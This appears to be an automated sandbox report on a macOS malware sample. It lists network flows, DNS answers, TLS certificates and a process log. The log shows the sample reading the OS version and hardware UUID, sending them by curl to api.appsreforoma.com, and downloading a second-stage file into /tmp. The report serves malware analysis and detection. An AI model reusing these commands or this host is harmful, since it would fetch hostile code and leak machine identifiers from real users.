Apr 19, 2024 11:47:24.728127003 CEST | 443 | 49401 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:24.728878975 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:24.731817007 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:24.731954098 CEST | 443 | 49401 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.077104092 CEST | 443 | 49401 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.078041077 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.078041077 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.084115982 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.084264040 CEST | 443 | 49401 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.084518909 CEST | 443 | 49401 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.085668087 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.085668087 CEST | 49401 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.100814104 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.100900888 CEST | 443 | 49402 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.101954937 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.102603912 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.102670908 CEST | 443 | 49402 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.450468063 CEST | 443 | 49402 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.451483965 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.451484919 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.459808111 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.460136890 CEST | 443 | 49402 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.460901976 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.460983038 CEST | 443 | 49402 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.461584091 CEST | 49402 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.482439041 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.482579947 CEST | 443 | 49403 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.483684063 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.484600067 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.484708071 CEST | 443 | 49403 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.829374075 CEST | 443 | 49403 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.830349922 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.830349922 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.837255955 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.837426901 CEST | 443 | 49403 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.837721109 CEST | 443 | 49403 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.838200092 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.838459969 CEST | 49403 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.853281021 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.853421926 CEST | 443 | 49404 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:25.854404926 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.855701923 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:25.855813026 CEST | 443 | 49404 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:26.205106020 CEST | 443 | 49404 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:26.207202911 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:26.207318068 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:26.214433908 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Apr 19, 2024 11:47:26.214755058 CEST | 443 | 49404 | 151.101.195.6 | 192.168.11.12 |
Apr 19, 2024 11:47:26.215408087 CEST | 49404 | 443 | 192.168.11.12 | 151.101.195.6 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 11:45:26.312273026 CEST | 49789 | 53 | 192.168.11.12 | 1.1.1.1 |
Apr 19, 2024 11:45:26.481062889 CEST | 53 | 49789 | 1.1.1.1 | 192.168.11.12 |
Apr 19, 2024 11:45:41.428456068 CEST | 53 | 52458 | 1.1.1.1 | 192.168.11.12 |
Apr 19, 2024 11:45:48.480866909 CEST | 59639 | 53 | 192.168.11.12 | 1.1.1.1 |
Apr 19, 2024 11:45:55.029654026 CEST | 61844 | 53 | 192.168.11.12 | 1.1.1.1 |
Apr 19, 2024 11:45:55.195477009 CEST | 53 | 61844 | 1.1.1.1 | 192.168.11.12 |
Apr 19, 2024 11:47:24.558094978 CEST | 58309 | 53 | 192.168.11.12 | 1.1.1.1 |
Apr 19, 2024 11:47:24.724334002 CEST | 53 | 58309 | 1.1.1.1 | 192.168.11.12 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Apr 19, 2024 11:45:47.546689987 CEST | 192.168.11.12 | 1.1.1.1 | 35ef | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 19, 2024 11:45:26.312273026 CEST | 192.168.11.12 | 1.1.1.1 | 0x317 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 11:45:48.480866909 CEST | 192.168.11.12 | 1.1.1.1 | 0x615b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 11:45:55.029654026 CEST | 192.168.11.12 | 1.1.1.1 | 0xfcc0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 11:47:24.558094978 CEST | 192.168.11.12 | 1.1.1.1 | 0x376a | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 19, 2024 11:45:18.418520927 CEST | 1.1.1.1 | 192.168.11.12 | 0x146a | No error (0) | 17.248.193.16 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:18.418520927 CEST | 1.1.1.1 | 192.168.11.12 | 0x146a | No error (0) | 17.248.193.20 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:18.418520927 CEST | 1.1.1.1 | 192.168.11.12 | 0x146a | No error (0) | 17.248.193.18 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:26.481062889 CEST | 1.1.1.1 | 192.168.11.12 | 0x317 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 11:45:48.641891003 CEST | 1.1.1.1 | 192.168.11.12 | 0x615b | No error (0) | updates.cdn-apple.com.akadns.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:55.195477009 CEST | 1.1.1.1 | 192.168.11.12 | 0xfcc0 | No error (0) | 151.101.131.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:55.195477009 CEST | 1.1.1.1 | 192.168.11.12 | 0xfcc0 | No error (0) | 151.101.67.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:55.195477009 CEST | 1.1.1.1 | 192.168.11.12 | 0xfcc0 | No error (0) | 151.101.3.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:45:55.195477009 CEST | 1.1.1.1 | 192.168.11.12 | 0xfcc0 | No error (0) | 151.101.195.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:47:24.724334002 CEST | 1.1.1.1 | 192.168.11.12 | 0x376a | No error (0) | 151.101.195.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:47:24.724334002 CEST | 1.1.1.1 | 192.168.11.12 | 0x376a | No error (0) | 151.101.67.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:47:24.724334002 CEST | 1.1.1.1 | 192.168.11.12 | 0x376a | No error (0) | 151.101.3.6 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 11:47:24.724334002 CEST | 1.1.1.1 | 192.168.11.12 | 0x376a | No error (0) | 151.101.131.6 | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Apr 19, 2024 11:45:18.591979980 CEST | 151.101.131.6 | 443 | 192.168.11.12 | 49347 | CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Mon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020 | Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030 | 771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0 | 5c118da645babe52f060d0754256a73c |
CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Wed Apr 29 14:54:50 CEST 2020 | Thu Apr 11 01:59:59 CEST 2030 | |||||||
Apr 19, 2024 11:45:18.957603931 CEST | 151.101.131.6 | 443 | 192.168.11.12 | 49350 | CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Mon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020 | Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030 | 771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0 | 5c118da645babe52f060d0754256a73c |
CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Wed Apr 29 14:54:50 CEST 2020 | Thu Apr 11 01:59:59 CEST 2030 | |||||||
Apr 19, 2024 11:45:18.960721016 CEST | 17.248.193.16 | 443 | 192.168.11.12 | 49349 | CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 | C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE CN=Apple Root CA, OU=Apple Certification Authority, O=Apple Inc., C=US | Wed Nov 01 09:04:18 CET 2023 Wed Dec 12 13:00:00 CET 2018 Thu Apr 28 23:38:00 CEST 2022 | Sat Nov 30 09:04:17 CET 2024 Wed May 07 14:00:00 CEST 2025 Wed May 07 02:00:00 CEST 2025 | 771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0 | 5c118da645babe52f060d0754256a73c |
C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Wed Dec 12 13:00:00 CET 2018 | Wed May 07 14:00:00 CEST 2025 | |||||||
C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 | CN=Apple Root CA, OU=Apple Certification Authority, O=Apple Inc., C=US | Thu Apr 28 23:38:00 CEST 2022 | Wed May 07 02:00:00 CEST 2025 | |||||||
Apr 19, 2024 11:45:19.345654964 CEST | 151.101.131.6 | 443 | 192.168.11.12 | 49352 | CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Mon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020 | Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030 | 771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0 | 5c118da645babe52f060d0754256a73c |
CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Wed Apr 29 14:54:50 CEST 2020 | Thu Apr 11 01:59:59 CEST 2030 |
System Behavior
Start time (UTC): | 09:45:17 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/libexec/xpcproxy |
Arguments: | - |
File size: | 44048 bytes |
MD5 hash: | 4764d9eafe6b7dac23253a9f8b7f73d6 |
Start time (UTC): | 09:45:17 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/libexec/nsurlstoraged |
Arguments: | /usr/libexec/nsurlstoraged --privileged |
File size: | 246624 bytes |
MD5 hash: | 321b0a40e24b45f0af49ba42742b3f64 |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 |
Arguments: | - |
File size: | 3722408 bytes |
MD5 hash: | 8910349f44a940d8d79318367855b236 |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /Users/bernard/Desktop/malw_sampl |
Arguments: | /Users/bernard/Desktop/malw_sampl |
File size: | 47222 bytes |
MD5 hash: | d3e39930bca4c4b57f6e1f241f0a31c8 |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/bin/curl |
Arguments: | curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0 |
File size: | 185072 bytes |
MD5 hash: | 2418204e23e2952e7995f1819a1f78f5 |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/bin/defaults |
Arguments: | defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion |
File size: | 40000 bytes |
MD5 hash: | fd63b6120ed5a062dbb6397bc9f8ffb8 |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:25 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/sbin/system_profiler |
Arguments: | system_profiler SPHardwareDataType |
File size: | 45472 bytes |
MD5 hash: | 271feb2b4c0447da2b7ac523f13a4824 |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/sbin/system_profiler |
Arguments: | - |
File size: | 45472 bytes |
MD5 hash: | 271feb2b4c0447da2b7ac523f13a4824 |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/bin/awk |
Arguments: | awk /UUID/ { print $3 } |
File size: | 112576 bytes |
MD5 hash: | c2a01c11db999f97496e09e12f468956 |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/bin/curl |
Arguments: | curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1 |
File size: | 185072 bytes |
MD5 hash: | 2418204e23e2952e7995f1819a1f78f5 |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/bin/curl |
Arguments: | curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593 |
File size: | 185072 bytes |
MD5 hash: | 2418204e23e2952e7995f1819a1f78f5 |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 618480 bytes |
MD5 hash: | be55e8952a262d0e524239dbf82191ed |
Start time (UTC): | 09:45:26 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/bin/curl |
Arguments: | curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3 |
File size: | 185072 bytes |
MD5 hash: | 2418204e23e2952e7995f1819a1f78f5 |
Start time (UTC): | 09:46:06 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/libexec/xpcproxy |
Arguments: | - |
File size: | 44048 bytes |
MD5 hash: | 4764d9eafe6b7dac23253a9f8b7f73d6 |
Start time (UTC): | 09:46:06 |
Start date (UTC): | 19/04/2024 |
Path: | /usr/libexec/firmwarecheckers/eficheck/eficheck |
Arguments: | /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon |
File size: | 74048 bytes |
MD5 hash: | 328beb81a2263449258057506bb4987f |